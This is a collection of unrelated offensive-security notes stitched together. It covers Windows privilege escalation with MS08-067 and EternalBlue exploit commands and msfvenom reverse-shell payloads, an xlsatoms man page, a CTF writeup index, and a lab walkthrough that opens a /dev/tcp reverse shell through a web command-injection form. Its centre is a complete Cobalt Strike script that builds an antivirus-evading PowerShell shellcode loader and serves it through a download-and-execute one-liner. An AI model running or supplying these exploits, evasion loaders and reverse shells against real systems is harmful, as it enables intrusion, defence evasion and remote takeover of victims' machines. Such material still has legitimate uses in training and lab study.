`C:\Windows\System32\wermgr.exe.local\` 3. Grant access to it: `cacls C:\Windows\System32\wermgr.exe.local /e /g everyone:f` 4. Place `spawn.dll` file and `dircreate2system.exe` in a same directory and run `.\dircreate2system.exe`. 5. Enjoy a shell as **NT AUTHORITY\SYSTEM** ## EoP - Common Vulnerabilities and Exposure ### MS08-067 (NetAPI) Check the vulnerability with the following nmap script. ```c nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms08-067 <ip_netblock> ``` Metasploit modules to exploit `MS08-067 NetAPI`. ```powershell exploit/windows/smb/ms08_067_netapi ``` If you can't use Metasploit and only want a reverse shell. ```powershell https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows Example: MS08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445 Example: MS08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used) Example: MS08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal Example: MS08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English Example: MS08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX) Example: MS08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX) Example: MS08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX) python ms08-067.py 10.0.0.1 6 445 ``` ### MS10-015 (KiTrap0D) - Microsoft Windows NT/2000/2003/2008/XP/Vista/7 'KiTrap0D' User Mode to Ring Escalation (MS10-015) ```powershell https://www.exploit-db.com/exploits/11199 Metasploit : exploit/windows/local/ms10_015_kitrap0d ``` ### MS11-080 (afd.sys) - Microsoft Windows XP/2003 ```powershell Python: https://www.exploit-db.com/exploits/18176 Metasploit: exploit/windows/local/ms11_080_afdjoinleaf ``` ### MS15-051 (Client Copy Image) - Microsoft Windows 2003/2008/7/8/2012 ```powershell printf("[#] usage: ms15-051 command \n"); printf("[#] eg: ms15-051 \"whoami /all\" \n"); # x32 https://github.com/rootphantomer/exp/raw/master/ms15-051%EF%BC%88%E4%BF%AE%E6%94%B9%E7%89%88%EF%BC%89/ms15-051/ms15-051/Win32/ms15-051.exe # x64 https://github.com/rootphantomer/exp/raw/master/ms15-051%EF%BC%88%E4%BF%AE%E6%94%B9%E7%89%88%EF%BC%89/ms15-051/ms15-051/x64/ms15-051.exe https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS15-051 use exploit/windows/local/ms15_051_client_copy_image ``` ### MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) Check if the patch is installed : `wmic qfe list | findstr "3139914"` ```powershell Powershell: https://www.exploit-db.com/exploits/39719/ https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1 Binary exe : https://github.com/Meatballs1/ms16-032 Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc ``` ### MS17-010 (Eternal Blue) Check the vulnerability with the following nmap script or crackmapexec: `crackmapexec smb 10.10.10.10 -u '' -p '' -d domain -M ms17-010`. ```c nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17–010 <ip_netblock> ``` Metasploit modules to exploit `EternalRomance/EternalSynergy/EternalChampion`. ```powershell auxiliary/admin/smb/ms17_010_command MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution auxiliary/scanner/smb/smb_ms17_010 MS17-010 SMB RCE Detection exploit/windows/smb/ms17_010_eternalblue MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption exploit/windows/smb/ms17_010_eternalblue_win8 MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+ exploit/windows/smb/ms17_010_psexec MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution ``` If you can't use Metasploit and only want a reverse shell. ```powershell git clone https://github.com/helviojunior/MS17-010 # generate a simple reverse shell to use msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o revshell.exe python2 send_and_execute.py 10.0.0.1 revshell.exe ``` ### CVE-2019-1388 Exploit : https://packetstormsecurity.com/files/14437/hhupd.exe.html Requirement: - Windows 7 - Windows 10 LTSC 10240 Failing on : - LTSC 2019 - 1709 - 1803 Detailed information about the vulnerability : https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege ## References * [icacls - Docs Microsoft](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/icacls) * [Privilege Escalation Windows - Philip Linghammar](https://web.archive.org/web/20191231011305/https://xapax.gitbooks.io/security/content/privilege_escalation_windows.html) * [Windows elevation of privileges - Guifre Ruiz](https://guif.re/windowseop) * [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/) * [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) * [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html) * [TOP–10 ways to boost your privileges in Windows systems - hackmag](https://hackmag.com/security/elevating-privileges-to-administrative-and-further/) * [The SYSTEM Challenge](https://decoder.cloud/2017/02/21/the-system-challenge/) * [Windows Privilege Escalation Guide - absolomb's security blog](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/) * [Chapter 4 - Windows Post-Exploitation - 2 Nov 2017 - dostoevskylabs](https://github.com/dostoevskylabs/dostoevsky-pentest-notes/blob/master/chapter-4.md) * [Remediation for Microsoft Windows Unquoted Service Path Enumeration Vulnerability - September 18th, 2016 - Robert Russell](https://www.tecklyfe.com/remediation-microsoft-windows-unquoted-service-path-enumeration-vulnerability/) * [Pentestlab.blog - WPE-01 - Stored Credentials](https://pentestlab.blog/2017/04/19/stored-credentials/) * [Pentestlab.blog - WPE-02 - Windows Kernel](https://pentestlab.blog/2017/04/24/windows-kernel-exploits/) * [Pentestlab.blog - WPE-03 - DLL Injection](https://pentestlab.blog/2017/04/04/dll-injection/) * [Pentestlab.blog - WPE-04 - Weak Service Permissions](https://pentestlab.blog/2017/03/30/weak-service-permissions/) * [Pentestlab.blog - WPE-05 - DLL Hijacking](https://pentestlab.blog/2017/03/27/dll-hijacking/) * [Pentestlab.blog - WPE-06 - Hot Potato](https://pentestlab.blog/2017/04/13/hot-potato/) * [Pentestlab.blog - WPE-07 - Group Policy Preferences](https://pentestlab.blog/2017/03/20/group-policy-preferences/) * [Pentestlab.blog - WPE-08 - Unquoted Service Path](https://pentestlab.blog/2017/03/09/unquoted-service-path/) * [Pentestlab.blog - WPE-09 - Always Install Elevated](https://pentestlab.blog/2017/02/28/always-install-elevated/) * [Pentestlab.blog - WPE-10 - Token Manipulation](https://pentestlab.blog/2017/04/03/token-manipulation/) * [Pentestlab.blog - WPE-11 - Secondary Logon Handle](https://pentestlab.blog/2017/04/07/secondary-logon-handle/) * [Pentestlab.blog - WPE-12 - Insecure Registry Permissions](https://pentestlab.blog/2017/03/31/insecure-registry-permissions/) * [Pentestlab.blog - WPE-13 - Intel SYSRET](https://pentestlab.blog/2017/06/14/intel-sysret/) * [Alternative methods of becoming SYSTEM - 20th November 2017 - Adam Chester @_xpn_](https://blog.xpnsec.com/becoming-system/) * [Living Off The Land Binaries and Scripts (and now also Libraries)](https://github.com/LOLBAS-Project/LOLBAS) * [Common Windows Misconfiguration: Services - 2018-09-23 - @am0nsec](https://web.archive.org/web/20191105182846/https://amonsec.net/2018/09/23/Common-Windows-Misconfiguration-Services.html) * [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf) * [Abusing Diaghub - xct - March 07, 2019](https://vulndev.io/2019/03/06/abusing-diaghub/) * [Windows Exploitation Tricks: Exploiting Arbitrary File Writes for Local Elevation of Privilege - James Forshaw, Project Zero - Wednesday, April 18, 2018](https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html) * [Weaponizing Privileged File Writes with the USO Service - Part 2/2 - itm4n - August 19, 2019](https://itm4n.github.io/usodllloader-part2/) * [Hacking Trick: Environment Variable $Path Interception y Escaladas de Privilegios para Windows](https://www.elladodelmal.com/2020/03/hacking-trick-environment-variable-path.html?m=1) * [Abusing SeLoadDriverPrivilege for privilege escalation - 14 JUN 2018 - OSCAR MALLO](https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/) * [Universal Privilege Escalation and Persistence – Printer - AUGUST 2, 2021)](https://pentestlab.blog/2021/08/02/universal-privilege-escalation-and-persistence-printer/) * [ABUSING ARBITRARY FILE DELETES TO ESCALATE PRIVILEGE AND OTHER GREAT TRICKS - March 17, 2022 | Simon Zuckerbraun](https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks) * [Bypassing AppLocker by abusing HashInfo - 2022-08-19 - Ian](https://shells.systems/post-bypassing-applocker-by-abusing-hashinfo/) * [Giving JuicyPotato a second chance: JuicyPotatoNG - @decoder_it, @splinter_code](https://decoder.cloud/2022/09/21/giving-juicypotato-a-second-chance-juicypotatong/) * [IN THE POTATO FAMILY, I WANT THEM ALL - @BlWasp_ ](https://hideandsec.sh/books/windows-sNL/page/in-the-potato-family-i-want-them-all) * [Potatoes - Windows Privilege Escalation - Jorge Lajara - November 22, 2020](https://jlajara.gitlab.io/Potatoes_Windows_Privesc)
sec-knowleage
xlsatoms === 列出X服务器内部所有定义的原子成分 ## 补充说明 **xlsatoms命令** 用于列出X服务器内部所有定义的原子成分,每个原子成分都有自身的编号。可利用参数设置列表范围,或直接指定欲查询的成分名称。 ### 语法 ```shell xlsatoms(选项) ``` ### 选项 * -display<显示器编号>:指定X Server连接的显示器编号,该编号由"0"开始计算,依序递增; * -format<输出格式>:设置成分清单的列表格式,您可使用控制字符改变显示样式; * -name<成分名称>:列出指定的成分; * -range<列表范围>:设置成分清单的列表范围。
sec-knowleage
Various writeups for the [2021 BSidesTLV CTF](https://ctf.bsidestlv.com) ([CTFTime Link](https://ctftime.org/event/1403)). Writeups for all challenges can be found [here](https://jctf.team/BSidesTLV-2021/). Participated as part of the [JCTF team](https://jctf.team/), which came in first! ![](images/top3.png)
sec-knowleage
# 0x00 简介 编写一个简单脚本我们以前面学的powershell免杀为例 我们只需要把上次写的payload替换掉就可以了 整理下思路: 用户输入ip和目录 -> 编码利用shellcode()函数生成的shellcode -> 反转编码 -> 替换payload -> 启动web服务 -> 输出payload URL # 0x01 过程 ### 窗口编写 窗口我们只需要 HOST PORT PUSH 监听器选择栏 这个直接注册到 attacks菜单栏就行了 ``` popup attacks { item "bypassav_shellcode" { local('$dialog %parameter'); %parameter["uri"] = "/a"; %parameter["host"] = localip(); %parameter["port"] = 8080; $dialog = dialog("bypassav_shellcode", %parameter, &new_payload); dialog_description($dialog, "bypassav_shellcode"); drow_text($dialog, "uri", "URI Path: ", 20); drow_text($dialog, "host", "Local Host: "); drow_text($dialog, "port", "Local Port: "); drow_listener_stage($dialog, "listener", "Listener: "); dbutton_action($dialog, "run"); dialog_show($dialog); } } ``` 用local注册2个变量 %parameter是类似字典的变量 其中dialog() dialog_description() drow_text() localip() drow_listener_stage() dbutton_action() dialog_show()皆为CS提供的函数 ,官方文档已经写的很清楚了前面我也提过几个。 ### 反转 编码 生成shellcode ``` $payload = shellcode($3['listener'],false,"x86"); $base64_payload = base64_encode($payload); @array_payload = split('',$base64_payload); @reverse_payload = reverse(@array_payload); $string_reverse_payload = join("",@reverse_payload); ``` 其中$3为前面dialog() 函数回调我们给我们的字典 ,用shellcode() 函数生成原生shellcode 然后用CS提供的base64_encode()函数编码 再转成数组 反序加入字符串 整个反转编码我们完成了 ### 替换payload ``` $data = ""; $data = $data ."U2V0LVN0cmljdE1vZGUgLVZlcnNpb24gMgokZWljYXIgPSAnJwokRG9JdCA9IEAnCiRhc3NlbWJseSA9IEAiCiAgICB1\r\n"; $decode_payload = base64_decode($data); $powershell_payload = replace($decode_payload,"thisispayload",$string_reverse_payload); ``` 这里我直接把前面那章的powershell 脚本编码了 然后解码替换。 ### 启动WEB ``` $url = site_host($3['host'],$3['port'],$3['uri'],$powershell_payload,"text/plain","powershell bypass av",false); prompt_text("URL: ", "powershell -nop -exec bypass -c \"IEX ((new-object net.webclient).downloadstring(\'".$url."\'))\"", {}); ``` 利用site_host() 函数启动web服务 然后返回对话框让我们复制 ### 组合脚本 ``` # bypass AV powershell # Author: 404 sub new_payload{ $payload = shellcode($3['listener'],false,"x86"); $base64_payload = base64_encode($payload); @array_payload = split('',$base64_payload); @reverse_payload = reverse(@array_payload); $string_reverse_payload = join("",@reverse_payload); $data = ""; $data = $data ."U2V0LVN0cmljdE1vZGUgLVZlcnNpb24gMgokZWljYXIgPSAnJwokRG9JdCA9IEAnCiRhc3NlbWJseSA9IEAiCiAgICB1\r\n"; $data = $data ."c2luZyBTeXN0ZW07CiAgICB1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7CiAgICBuYW1lc3BhY2Ug\r\n"; $data = $data ."aW5qZWN0IHsKICAgICAgICBwdWJsaWMgY2xhc3MgZnVuYyB7CiAgICAgICAgICAgIFtGbGFnc10gcHVibGljIGVudW0g\r\n"; $data = $data ."QWxsb2NhdGlvblR5cGUgeyBDb21taXQgPSAweDEwMDAsIFJlc2VydmUgPSAweDIwMDAgfQogICAgICAgICAgICBbRmxh\r\n"; $data = $data ."Z3NdIHB1YmxpYyBlbnVtIE1lbW9yeVByb3RlY3Rpb24geyBFeGVjdXRlUmVhZFdyaXRlID0gMHg0MCB9CiAgICAgICAg\r\n"; $data = $data ."ICAgIFtGbGFnc10gcHVibGljIGVudW0gVGltZSA6IHVpbnQgeyBJbmZpbml0ZSA9IDB4RkZGRkZGRkYgfQogICAgICAg\r\n"; $data = $data ."ICAgICBbRGxsSW1wb3J0KCJrZXJuZWwzMi5kbGwiKV0gcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFZpcnR1YWxB\r\n"; $data = $data ."bGxvYyhJbnRQdHIgbHBBZGRyZXNzLCB1aW50IGR3U2l6ZSwgdWludCBmbEFsbG9jYXRpb25UeXBlLCB1aW50IGZsUHJv\r\n"; $data = $data ."dGVjdCk7CiAgICAgICAgICAgIFtEbGxJbXBvcnQoImtlcm5lbDMyLmRsbCIpXSBwdWJsaWMgc3RhdGljIGV4dGVybiBJ\r\n"; $data = $data ."bnRQdHIgQ3JlYXRlVGhyZWFkKEludFB0ciBscFRocmVhZEF0dHJpYnV0ZXMsIHVpbnQgZHdTdGFja1NpemUsIEludFB0\r\n"; $data = $data ."ciBscFN0YXJ0QWRkcmVzcywgSW50UHRyIGxwUGFyYW1ldGVyLCB1aW50IGR3Q3JlYXRpb25GbGFncywgSW50UHRyIGxw\r\n"; $data = $data ."VGhyZWFkSWQpOwogICAgICAgICAgICBbRGxsSW1wb3J0KCJrZXJuZWwzMi5kbGwiKV0gcHVibGljIHN0YXRpYyBleHRl\r\n"; $data = $data ."cm4gaW50IFdhaXRGb3JTaW5nbGVPYmplY3QoSW50UHRyIGhIYW5kbGUsIFRpbWUgZHdNaWxsaXNlY29uZHMpOwogICAg\r\n"; $data = $data ."ICAgIH0KICAgIH0KIkAKJGNvbXBpbGVyID0gTmV3LU9iamVjdCBNaWNyb3NvZnQuQ1NoYXJwLkNTaGFycENvZGVQcm92\r\n"; $data = $data ."aWRlcgokcGFyYW1zID0gTmV3LU9iamVjdCBTeXN0ZW0uQ29kZURvbS5Db21waWxlci5Db21waWxlclBhcmFtZXRlcnMK\r\n"; $data = $data ."JHBhcmFtcy5SZWZlcmVuY2VkQXNzZW1ibGllcy5BZGRSYW5nZShAKCJTeXN0ZW0uZGxsIiwgW1BzT2JqZWN0XS5Bc3Nl\r\n"; $data = $data ."bWJseS5Mb2NhdGlvbikpCiRwYXJhbXMuR2VuZXJhdGVJbk1lbW9yeSA9ICRUcnVlCiRyZXN1bHQgPSAkY29tcGlsZXIu\r\n"; $data = $data ."Q29tcGlsZUFzc2VtYmx5RnJvbVNvdXJjZSgkcGFyYW1zLCAkYXNzZW1ibHkpCkZ1bmN0aW9uIHJldnN0cmluZygkdG9j\r\n"; $data = $data ."aGFyKQp7CiAgICAkdG9jaGFyID0gJHRvY2hhci5Ub0NoYXJBcnJheSgpCiAgICBbQXJyYXldOjpSZXZlcnNlKCR0b2No\r\n"; $data = $data ."YXIpCiAgICAkdG9jaGFyID0gLWpvaW4gJHRvY2hhcgogICAgcmV0dXJuICR0b2NoYXIKfQokYSA9IHJldnN0cmluZyAi\r\n"; $data = $data ."dGhpc2lzcGF5bG9hZCIKW0J5dGVbXV0kdmFyX2NvZGUgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5n\r\n"; $data = $data ."KCRhKQokYnVmZmVyID0gICYoICRQU0hvTWVbNF0rJFBTaG9tRVszMF0rJ3gnKShOZXctT2JKZWNUIHNZU1RlbS5pTy5T\r\n"; $data = $data ."VHJFQU1SRUFERXIoKE5ldy1PYkplY1QgU1lzdGVtLklPLkNPbXByRVNzaU9uLkRlZkxBdEVTVFJFYU0oW2lPLm1lbW9S\r\n"; $data = $data ."eVN0UkVhTV0gW3NZc3RlbS5jT252RVJUXTo6ZnJPTUJBU2U2NHN0UmlOZygnaTg3TXkwcE5MdEZMSzgxTGpyV3lDc3Nz\r\n"; $data = $data ."S2lsTnpISE15Y2xQMWpEUVVWQXBTeXlLVDg1UFNkWHpTYzFMTDhsUTBGWXcxRkdJUnRLa0RWYWJXSktabnhkU1daQUtO\r\n"; $data = $data ."Q01vdFRpMXFDeFZRVGZKdjRpQVV1ZjgzTnpNRWpRRGZWTno4NHNxQTRyeVM0QkNRTFZBZGE0VnFjbWxKYWxCcVlrcDRV\r\n"; $data = $data ."V1pKYW1hQUE9PScpICxbaW8uY29NUFJFU3NJb04uQ29tUHJlU1NpT25tT2RlXTo6REVDT01wcmVTcyApICkgLFtUZVhU\r\n"; $data = $data ."LkVuY29kSW5HXTo6YXNDSUkpKS5SZUFkdG9lbmQoKSAKaWYgKFtCb29sXSEkYnVmZmVyKSB7IAogICAgJGdsb2JhbDpy\r\n"; $data = $data ."ZXN1bHQgPSAzOyAKICAgIHJldHVybiAKfQpbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpD\r\n"; $data = $data ."b3B5KCR2YXJfY29kZSwgMCwgJGJ1ZmZlciwgJHZhcl9jb2RlLkxlbmd0aCkKW0ludFB0cl0gJHRocmVhZCA9IFtpbmpl\r\n"; $data = $data ."Y3QuZnVuY106OkNyZWF0ZVRocmVhZCgwLCAwLCAkYnVmZmVyLCAwLCAwLCAwKQppZiAoW0Jvb2xdISR0aHJlYWQpIHsK\r\n"; $data = $data ."ICAgICRnbG9iYWw6cmVzdWx0ID0gNzsgCiAgICByZXR1cm4gCn0KJHJlc3VsdDIgPSBbaW5qZWN0LmZ1bmNdOjpXYWl0\r\n"; $data = $data ."Rm9yU2luZ2xlT2JqZWN0KCR0aHJlYWQsIFtpbmplY3QuZnVuYytUaW1lXTo6SW5maW5pdGUpCidACklmIChbSW50UHRy\r\n"; $data = $data ."XTo6c2l6ZSAtZXEgOCkgewogICAgc3RhcnQtam9iIHsgcGFyYW0oJGEpIElFWCAkYSB9IC1SdW5BczMyIC1Bcmd1bWVu\r\n"; $data = $data ."dCAkRG9JdCB8IHdhaXQtam9iIHwgUmVjZWl2ZS1Kb2IKfQplbHNlIHsKICAgIElFWCAkRG9JdAp9\r\n"; $decode_payload = base64_decode($data); $powershell_payload = replace($decode_payload,"thisispayload",$string_reverse_payload); $url = site_host($3['host'],$3['port'],$3['uri'],$powershell_payload,"text/plain","powershell bypass av",false); prompt_text("URL: ", "powershell -nop -exec bypass -c \"IEX ((new-object net.webclient).downloadstring(\'".$url."\'))\"", {}); } popup attacks { item "bypassav_shellcode" { local('$dialog %parameter'); %parameter["uri"] = "/a"; %parameter["host"] = localip(); %parameter["port"] = 8080; $dialog = dialog("bypassav_shellcode", %parameter, &new_payload); dialog_description($dialog, "bypassav_shellcode"); drow_text($dialog, "uri", "URI Path: ", 20); drow_text($dialog, "host", "Local Host: "); drow_text($dialog, "port", "Local Port: "); drow_listener_stage($dialog, "listener", "Listener: "); dbutton_action($dialog, "run"); dialog_show($dialog); } } ``` # 0x02 文末 编写脚本注意多利用官方文档,多看sleep语法,他给我们提供了一些方便快捷的函数,多看看大佬们的脚本也能提高自己。 ### 本文如有错误,请及时提醒,以免误导他人
sec-knowleage
# DJINN: 1 > https://download.vulnhub.com/djinn/djinn.ova 靶场IP:`192.168.32.214` 扫描对外端口服务 ``` ┌──(root💀kali)-[/tmp] └─# nmap -p 1-65535 -sV 192.168.32.214 Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-08 03:16 EDT Nmap scan report for 192.168.32.214 Host is up (0.00070s latency). Not shown: 65531 closed tcp ports (reset) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp filtered ssh 1337/tcp open waste? 7331/tcp open http Werkzeug httpd 0.16.0 (Python 2.7.15+) 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port1337-TCP:V=7.92%I=7%D=9/8%Time=631996C4%P=x86_64-pc-linux-gnu%r(NUL SF:L,1BC,"\x20\x20____\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20 SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_____\x20_\x20\x20\x20\x20\ SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20/\x20___\|\x20__\x SF:20_\x20_\x20__\x20___\x20\x20\x20___\x20\x20\|_\x20\x20\x20_\(_\)_\x20_ SF:_\x20___\x20\x20\x20___\x20\n\|\x20\|\x20\x20_\x20/\x20_`\x20\|\x20'_\x SF:20`\x20_\x20\\\x20/\x20_\x20\\\x20\x20\x20\|\x20\|\x20\|\x20\|\x20'_\x2 SF:0`\x20_\x20\\\x20/\x20_\x20\\\n\|\x20\|_\|\x20\|\x20\(_\|\x20\|\x20\|\x SF:20\|\x20\|\x20\|\x20\|\x20\x20__/\x20\x20\x20\|\x20\|\x20\|\x20\|\x20\| SF:\x20\|\x20\|\x20\|\x20\|\x20\x20__/\n\x20\\____\|\\__,_\|_\|\x20\|_\|\x SF:20\|_\|\\___\|\x20\x20\x20\|_\|\x20\|_\|_\|\x20\|_\|\x20\|_\|\\___\|\n\ SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20 SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2 SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n SF:\nLet's\x20see\x20how\x20good\x20you\x20are\x20with\x20simple\x20maths\ SF:nAnswer\x20my\x20questions\x201000\x20times\x20and\x20I'll\x20give\x20y SF:ou\x20your\x20gift\.\n\(7,\x20'-',\x209\)\n>\x20")%r(RPCCheck,1BC,"\x20 SF:\x20____\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2 SF:0\x20\x20\x20\x20\x20\x20\x20\x20_____\x20_\x20\x20\x20\x20\x20\x20\x20 SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20/\x20___\|\x20__\x20_\x20_\x2 SF:0__\x20___\x20\x20\x20___\x20\x20\|_\x20\x20\x20_\(_\)_\x20__\x20___\x2 SF:0\x20\x20___\x20\n\|\x20\|\x20\x20_\x20/\x20_`\x20\|\x20'_\x20`\x20_\x2 SF:0\\\x20/\x20_\x20\\\x20\x20\x20\|\x20\|\x20\|\x20\|\x20'_\x20`\x20_\x20 SF:\\\x20/\x20_\x20\\\n\|\x20\|_\|\x20\|\x20\(_\|\x20\|\x20\|\x20\|\x20\|\ SF:x20\|\x20\|\x20\x20__/\x20\x20\x20\|\x20\|\x20\|\x20\|\x20\|\x20\|\x20\ SF:|\x20\|\x20\|\x20\x20__/\n\x20\\____\|\\__,_\|_\|\x20\|_\|\x20\|_\|\\__ SF:_\|\x20\x20\x20\|_\|\x20\|_\|_\|\x20\|_\|\x20\|_\|\\___\|\n\x20\x20\x20 SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2 SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\nLet's\x20 SF:see\x20how\x20good\x20you\x20are\x20with\x20simple\x20maths\nAnswer\x20 SF:my\x20questions\x201000\x20times\x20and\x20I'll\x20give\x20you\x20your\ SF:x20gift\.\n\(6,\x20'-',\x208\)\n>\x20"); MAC Address: 00:0C:29:C9:35:56 (VMware) Service Info: OS: Unix Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 91.20 seconds ``` FTP匿名登录 ``` ┌──(root💀kali)-[/tmp] └─# ftp 192.168.32.214 Connected to 192.168.32.214. 220 (vsFTPd 3.0.3) Name (192.168.32.214:root): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -al 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 2 0 115 4096 Oct 21 2019 . drwxr-xr-x 2 0 115 4096 Oct 21 2019 .. -rw-r--r-- 1 0 0 11 Oct 20 2019 creds.txt -rw-r--r-- 1 0 0 128 Oct 21 2019 game.txt -rw-r--r-- 1 0 0 113 Oct 21 2019 message.txt 226 Directory send OK. ``` 下载文件 ``` ftp> get creds.txt local: creds.txt remote: creds.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for creds.txt (11 bytes). 226 Transfer complete. 11 bytes received in 0.01 secs (0.8511 kB/s) ftp> get game.txt local: game.txt remote: game.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for game.txt (128 bytes). 226 Transfer complete. 128 bytes received in 0.01 secs (11.3030 kB/s) ftp> get message.txt local: message.txt remote: message.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for message.txt (113 bytes). 226 Transfer complete. 113 bytes received in 0.01 secs (10.2940 kB/s) ``` 查看文件 ``` ┌──(root💀kali)-[/tmp] └─# cat creds.txt nitu:81299 ┌──(root💀kali)-[/tmp] └─# cat game.txt oh and I forgot to tell you I've setup a game for you on port 1337. See if you can reach to the final level and get the prize. ┌──(root💀kali)-[/tmp] └─# cat message.txt @nitish81299 I am going on holidays for few days, please take care of all the work. And don't mess up anything. ``` 浏览器访问7331端口 ![image-20220908153012137](../../.gitbook/assets/image-20220908153012137.png) 爆破目录 ``` ┌──(root💀kali)-[/tmp] └─# gobuster dir -e -u http://192.168.32.214:7331/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.32.214:7331/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Expanded: true [+] Timeout: 10s =============================================================== 2022/09/08 03:31:15 Starting gobuster in directory enumeration mode =============================================================== http://192.168.32.214:7331/wish (Status: 200) [Size: 385] http://192.168.32.214:7331/genie (Status: 200) [Size: 1676] =============================================================== 2022/09/08 03:35:32 Finished =============================================================== ``` 访问`/wish`路径,可以有个命令执行窗口 ![image-20220908154614854](../../.gitbook/assets/image-20220908154614854.png) 返回结果 ![image-20220908154728362](../../.gitbook/assets/image-20220908154728362.png) 输入反弹shell ``` ┌──(root💀kali)-[/tmp] └─# echo 'bash -i >& /dev/tcp/192.168.32.130/1234 0>&1' |base64 YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMyLjEzMC8xMjM0IDA+JjEK ``` ``` bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMyLjEzMC8xMjM0IDA+JjEK}|{base64,-d}|{bash,-i}' ``` ![image-20220908155005843](../../.gitbook/assets/image-20220908155005843.png) ![image-20220908154957335](../../.gitbook/assets/image-20220908154957335.png) 找到一个密码 ``` www-data@djinn:/opt/80$ cd /home cd /home www-data@djinn:/home$ ls ls nitish sam www-data@djinn:/home$ cd nitish cd nitish www-data@djinn:/home/nitish$ ls -al ls -al total 32 drwxr-xr-x 5 nitish nitish 4096 Nov 12 2019 . drwxr-xr-x 4 root root 4096 Nov 14 2019 .. -rw------- 1 root root 130 Nov 12 2019 .bash_history -rw-r--r-- 1 nitish nitish 3771 Nov 11 2019 .bashrc drwx------ 2 nitish nitish 4096 Nov 11 2019 .cache drwxr-xr-x 2 nitish nitish 4096 Oct 21 2019 .dev drwx------ 3 nitish nitish 4096 Nov 11 2019 .gnupg -rw-r----- 1 nitish nitish 33 Nov 12 2019 user.txt www-data@djinn:/home/nitish$ cat user.txt cat user.txt cat: user.txt: Permission denied www-data@djinn:/home/nitish$ cd .dev cd .dev 